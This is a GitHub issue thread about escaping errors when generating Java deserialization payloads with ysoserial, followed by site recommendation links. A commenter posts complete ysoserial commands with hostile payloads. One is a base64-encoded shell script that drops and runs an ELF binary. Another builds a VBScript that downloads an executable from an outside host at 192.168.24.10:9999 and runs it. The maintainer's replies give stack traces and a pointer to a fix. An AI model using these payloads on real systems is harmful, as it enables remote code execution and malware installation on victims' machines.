Comments (7)
hktalent
commented on July 20, 2024
so is ok
java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'echo cm0gLXJmIG9rLmVsZjtlY2hvICJmMFZNUmdFQkFRQUFBQUFBQUFBQUFBSUFBd0FCQUFBQVZJQUVDRFFBQUFBQUFBQUFBQUFBQURRQUlBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFJQUVDQUNBQkFqUEFBQUFTZ0VBQUFjQ1kdjM0MU5EVTJvQ3NHYUo0YzJBbDF0b1lVQlJlR2dDQURBNWllRnFabGhRVVZlSjRVUE5nSVhBZVJsT2REMW9vZ0FBQUZocUFHb0ZpZU14eWMyQWhjQjV2ZXNuc2dlNUFCQUFBSW5qd2VzTXdlTU1zSDNOZ0lYQWVCQmJpZUdadGd5d0E4MkFoY0I0QXYvaHVBRUFBQUM3QVFBQUFNMkEifGJhc2U2NCAtZD5vay5lbGY7Y2htb2QgNTU1IG9rLmVsZjsuL29rLmVsZiAmCg== |base64 -d|sh'> tmp/payload.bin
from ysoserial.
frohoff
commented on July 20, 2024
I'd like to reopen this since it seems to be a genuine issue with escaping in the payload code generation
from ysoserial.
frohoff
commented on July 20, 2024
Also seems to break with a different error in the multiarg branch
$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'rm -rf ok.elf;echo "f0VMRgEAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toYUBReGgCAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZt2AhcB4Av/huAEAAAC7AQAAAM2A"|base64 -d>ok.elf;chmod 555 ok.elf;./ok.elf &'
Error while generating or serializing payload
javassist.CannotCompileException: [source error] syntax error near "t2AhcB4Av/huAEAAAC7A"
at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:124)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:105)
at ysoserial.payloads.Jdk7u21.getObject(Jdk7u21.java:63)
at ysoserial.GeneratePayload.main(GeneratePayload.java:38)
Caused by: compile error: syntax error near "t2AhcB4Av/huAEAAAC7A"
at javassist.compiler.Parser.parseArrayInitializer(Parser.java:677)
at javassist.compiler.Parser.parseNew(Parser.java:1287)
...from ysoserial.
hktalent
commented on July 20, 2024
thanks @frohoff
java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar BeanShell1 'cmd.exe /c del poc.vbs& del mess.exe& @echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs&@echo objXMLHTTP.open "GET","http://192.168.24.10:9999/2410_4445.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLHTTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFile "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objADOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=Nothing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs'
from ysoserial.
hktalent
commented on July 20, 2024
byte[] bytes = {...}
String str = new String(bytes, "UTF-8");
String cd="Holding some value";
Converting from string to byte[]:
byte[] cookie = new sun.misc.BASE64Decoder().decodeBuffer(cd);
Converting from byte[] to string:
cd = new sun.misc.BASE64Encoder().encode(cookie);
https://stackoverflow.com/questions/1536054/how-to-convert-byte-array-to-string-and-vice-versa
from ysoserial.
hktalent
commented on July 20, 2024
from ysoserial.
frohoff
commented on July 20, 2024
Any of these errors should be resolved by #151
from ysoserial.
Related Issues (20)
- Troubleshooting docs
- i can't found ysoserial.jar ! HOT 2
- ysoserial doesn't work with Java 18 HOT 1
- another way to Get PoC with RCE HOT 1
- Help understanding the CommonsBeanutils1 payload HOT 1
- Error while generating or serializing payload(openjdk17) HOT 1
- Ysoserial doesn't work with Java version 17 HOT 11
- Error: Unable to access jarfile ysoserial.jar HOT 6
- Error while generating or serializing payload (FIXED) HOT 2
- A tool for fuzzing the right payload HOT 3
- I don't know how to input next. HOT 2
- How can I create the sleep payload in the following payload with ysoserial? HOT 1
- Common Collection1 failed HOT 1
- Hello, I have some confusion about the code implementation of URLDNS HOT 2
- getting error while executing the command HOT 1
- ERROR when building → javax.interceptor depency no longer available at repo.jenkins-ci.org
- Ysoserial - System.IO.FileNotFoundException HOT 1
- parameter 'descriptor' has been removed from the plugin, please verify documentation.
- javax.interceptor-api/3.1 is no longer available HOT 1
- Build Failure HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from ysoserial.